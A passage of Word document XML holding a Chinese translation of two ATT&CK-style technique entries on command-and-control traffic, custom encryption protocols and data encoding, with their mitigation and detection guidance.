          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED6B203" w14:textId="772CD2B7" w:rsidR="00A0413E" w:rsidRDefault="00846E36" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>自定义</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E" w:rsidRPr="00AB378F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="1D0C013D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D781282" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> T1024</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="526AAA9D" w14:textId="480C54AD" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
              </w:rPr>
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61203B60" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C92B2C2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E728DB">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包，Netflow/Enclave技术网络流分析，进程使用网络，恶意代码逆向工程，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E09100" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C275C48" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="709834C8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B306C8" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2DE2A1" w14:textId="10E2F8A8" w:rsidR="00A0413E" w:rsidRPr="00EA39A7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用自定义加密协议或算法来隐藏</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个简单的方案，例如用固定密钥对明文进行异或，将产生一个非常弱的密文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C0BA2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EA39A7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义加密方案的复杂程度可能不同。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件样本的分析和逆向工程可能足以发现所使用的算法和加密密钥。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F373B30" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些攻击者还可能尝试实现他们自己版本的众所周知的加密算法，而不是使用已知的实现库，这可能导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意想不到</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E68BAA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="06292FEC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="339"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1B88A98A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="64DCD01F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00E929B7" w14:paraId="57C60FFE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="1276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75203178" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E929B7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F16C665" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E929B7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络签名来识别特定恶意软件的流量的网络入侵检测和防御系统可用于缓解网络级别的活动。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>由于使用的自定义协议可能不符合典型的协议标准，因此可能有机会在网络级别识别流量以进行检测。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签签名通常是用于协议内的唯一识别符，并且是基于特定对手或工具使用的特定协议，并且可能在各种恶意软件系列和版本之间不同。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可能会随着时间的推移改变工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E929B7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名或构建协议，以避免被常见的防御工具检测到。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6460747D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EA39A7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6361CADB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B01F88" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EA39A7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果恶意软件使用带有对称密钥的自定义加密，则可以从样本中获取算法和密钥，并使用它们来解码网络流量以检测恶意软件通信签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6746E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，分析网络数据以寻找不常见的数据流（例如，客户端发送的数据明显多于从服务器接收的数据）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用通常不具有网络通信或从未见过的网络的过程是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容以检测通信何时不遵循正在使用的端口的预期协议行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D7980" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>数据编码</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="1EBDA375" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="724AFFA9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> T1132</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="423EE045" w14:textId="7374F920" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012E83DF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7085BC74" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559BA20E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包，进程使用网络，进程监控，网络协议分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EA4D877" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25111DDB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t>: Itzik Kotler, SafeBreach</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CB31F1F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C348602" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B306C8" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3605F802" w14:textId="5FAE0889" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用标准数据编码系统对</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）信息进行编码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据编码的使用可以遵循现有协议规范，并且包括使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Base64</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MIME</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他二进制到文本和字符编码系统。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些数据编码系统也可能导致数据压缩，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA39A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08332E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="8181"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="456B1D9D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3BA02601" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="09DEDA58" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00242E26" w14:paraId="4679DCEE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="1276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="395BD9FD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13C6A378" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络签名来识别特定恶意软件的流量的网络入侵检测和防御系统可用于缓解网络级别的活动。</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名通常用于协议内的唯一识别符，基于特定对手或工具使用的特定混淆技术，并且可能在各种恶意软件系列和版本之间不同。</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可能会随着时间的推移改变工具</w:t>
